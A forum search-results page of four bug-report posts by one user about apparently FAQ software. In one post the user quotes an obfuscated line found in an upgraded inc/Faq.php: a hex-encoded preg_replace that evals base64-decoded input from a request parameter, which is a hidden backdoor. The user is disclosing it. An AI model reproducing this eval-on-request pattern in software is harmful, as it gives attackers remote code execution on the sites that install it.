Search found 4 matches

by KwikSilvr
Wed Dec 15, 2010 5:32 pm
Forum: Bug reports
Topic: Blank Homepage After Category/FAQ Creation
Replies: 13
Views: 10216

Re: Blank Homepage After Category/FAQ Creation

Just FYI, i see the same thing in 2.6.11

2.6.10 is clean. I actually found the Faq.php changes by comparing the checksum of all the files in 2.6.10 to 2.6.11 to see what files came up as different...
by KwikSilvr
Wed Dec 15, 2010 3:40 pm
Forum: Bug reports
Topic: Blank Homepage After Category/FAQ Creation
Replies: 13
Views: 10216

Re: Blank Homepage After Category/FAQ Creation

I've found the issue for me at least; in inc/Faq.php on line 1614: $topTen = @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\134\x31\51\x29\73","\x24\137\x52\105\x51\125\x45\123\x54\133\x27\160\x68\160\x6d\171\x66\141\x71\13...
by KwikSilvr
Wed Dec 15, 2010 2:05 pm
Forum: Bug reports
Topic: Blank Homepage After Category/FAQ Creation
Replies: 13
Views: 10216

Re: Blank Homepage After Category/FAQ Creation

I have a similar issue. I have 2.6.9 installed and working fine. This morning I tried to upgrade to 2.6.12 and after the upgrade the main page is blank. The admin page still works. So I reverted back to 2.6.9 and attempted incremental upgrades: 2.6.10 works 2.6.11 gets the blank home page; admin pag...
by KwikSilvr
Tue May 04, 2010 2:27 pm
Forum: Bug reports
Topic: V2.6.2 : Undefined index: in Category.php
Replies: 12
Views: 10503

Re: V2.6.2 : Undefined index: in Category.php

I still see this issue in the 2.6.4 version. In my case it appears to be tied to how the categories are configured. I have a top category with 7 sub-categories. One of the Admins changed the permissions on the top category to be locked to a specific group, but all of the sub-categories were open to ...